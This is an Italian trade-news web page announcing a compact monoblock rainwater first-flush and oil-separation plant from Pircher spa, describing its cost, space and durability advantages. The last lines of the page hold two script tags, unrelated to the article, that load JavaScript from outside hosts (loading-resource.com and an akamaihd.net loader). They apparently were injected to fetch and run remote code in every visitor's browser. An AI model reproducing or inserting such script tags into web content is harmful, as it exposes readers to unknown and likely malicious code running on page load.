1. Home
  2. Notizie e Mercato
  3. Nuovo impianto compatto di prima pioggia e separazione oli di Pircher spa

Nuovo impianto compatto di prima pioggia e separazione oli di Pircher spa

Impianti idrici di
5/5
votato da 1 persone
Pircher che offre soluzioni per l’ambiente dal 1969, lancia un nuovo sistema che supera i limiti del procedimento tradizionale che prevede l’impiego di due o più vasche distinte


Pircher lancia un nuovo impianto, che condensa in un unico manufatto monoblocco l’intero processo di convogliamento,raccolta e trattamento delle acque reflue derivanti da piazzali, strade e parcheggi, indispensabile prima della loro immissione nelle reti fognarie e nella acque bianche.

Il nuovo sistema risulta più economico sia in termini di oneri di scavo e sia di riduzione dei tempi per la movimentazione e installazione in cantiere.

È particolarmente adatto in contesti in cui lo spazio disponibile per l’alloggiamento dell’impianto è ridotto.

Le vasche impiegate sono caratterizzate da un’ottima resistenza alla corrosione da carbonatazione, all’attacco del gelo e disgelo, agli ambienti chimici aggressivi e alla corrosione dei cloruri.

Garantendo alte prestazioni in termini di solidità e sicurezza sono prodotte con particolare attenzione alle armature della struttura interna, predisposte in base alla zona sismica in cui andranno collocate e secondo quanto previsto dal D.M. del 14 gennaio 2008.

Per maggiori informazioni visiti la pagina del sitohttp://www.pircher-edilizia.com/scarichi-acque-reflue

<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script>